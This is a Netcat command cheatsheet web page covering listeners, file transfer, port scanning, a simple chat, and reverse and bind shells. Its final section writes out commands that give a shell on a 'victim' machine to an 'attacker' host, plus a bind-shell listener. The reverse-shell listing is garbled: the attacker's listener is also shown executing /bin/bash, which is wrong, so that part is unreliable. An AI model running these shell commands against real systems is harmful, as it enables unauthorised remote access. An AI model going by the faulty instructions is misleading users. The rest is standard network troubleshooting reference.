Minimize downtime from code errors

Self-Hosted AI Code Reviewer

Hexmos LiveReview AI-Powered Code Review
Live Review
AI-Powered Code Review

Netcat - Versatile Networking Utility for Data Transfer and Shells

Learn how to use Netcat (nc) for various networking tasks, including data transfer, port scanning, and creating reverse/bind shells. Master this essential command-line tool.

Netcat

Netcat, often abbreviated as nc, is a powerful and versatile networking utility that reads and writes data across network connections using the TCP/IP protocol. It's often referred to as the "Swiss Army knife" for network administrators and security professionals due to its wide range of applications, from simple data transfer to complex network diagnostics and security testing.

Netcat: Essential Networking Commands

This section provides practical examples of how to leverage Netcat for common networking tasks. Understanding these commands is crucial for efficient network management and troubleshooting.

Starting a TCP Server

To initiate a simple TCP server that listens on a specific port, use the -l (listen) and -p (port) flags:

# Start a simple TCP server on a specified port
nc -l -p PORT_NUMBER

Connecting to a TCP Server

To establish a connection to an existing TCP server, provide the server's IP address and port number:

# Connect to a TCP server on a specified IP address and port
nc IP_ADDRESS PORT_NUMBER

File Transfer with Netcat

Netcat can be used to transfer files between machines. This involves setting up a listener on one machine and connecting from another.

On the server side (listening and sending the file):

nc -l -p PORT_NUMBER < filename

On the client side (receiving the file):

nc IP_ADDRESS PORT_NUMBER > filename

Port Scanning with Netcat

Netcat can perform basic port scanning to check for open ports on a target host. The -z flag tells Netcat to just report the status of the connection without sending any data, and -v provides verbose output.

# Scan open ports on a target host
nc -zv IP_ADDRESS PORT_RANGE

Simple Chat Tool

Netcat can be configured to act as a rudimentary chat application between two machines.

On one machine (listening):

nc -l -p PORT_NUMBER

On another machine (connecting to the listener):

nc IP_ADDRESS PORT_NUMBER

Reverse and Bind Shells

Netcat is frequently used to create shell access between machines, which is a common technique in network security testing and penetration testing.

Creating a reverse shell from a client to a server:

On the attacker's machine (listening for the incoming shell):

nc -l -p PORT_NUMBER -e /bin/bash

On the victim's machine (connecting back to the attacker's machine and executing a shell):

nc IP_ADDRESS PORT_NUMBER -e /bin/bash

Creating a bind shell on the server side:

On the server machine (listening and attaching a shell):

nc -l -p PORT_NUMBER -e /bin/bash

On the client machine (connecting to the bind shell):

nc IP_ADDRESS PORT_NUMBER

Further Reading and Resources

For a deeper understanding of Netcat and its capabilities, consult the official documentation and related networking resources:

← Back to cmd cheatsheets All cheatsheets 🙏  Credits & Acknowledgments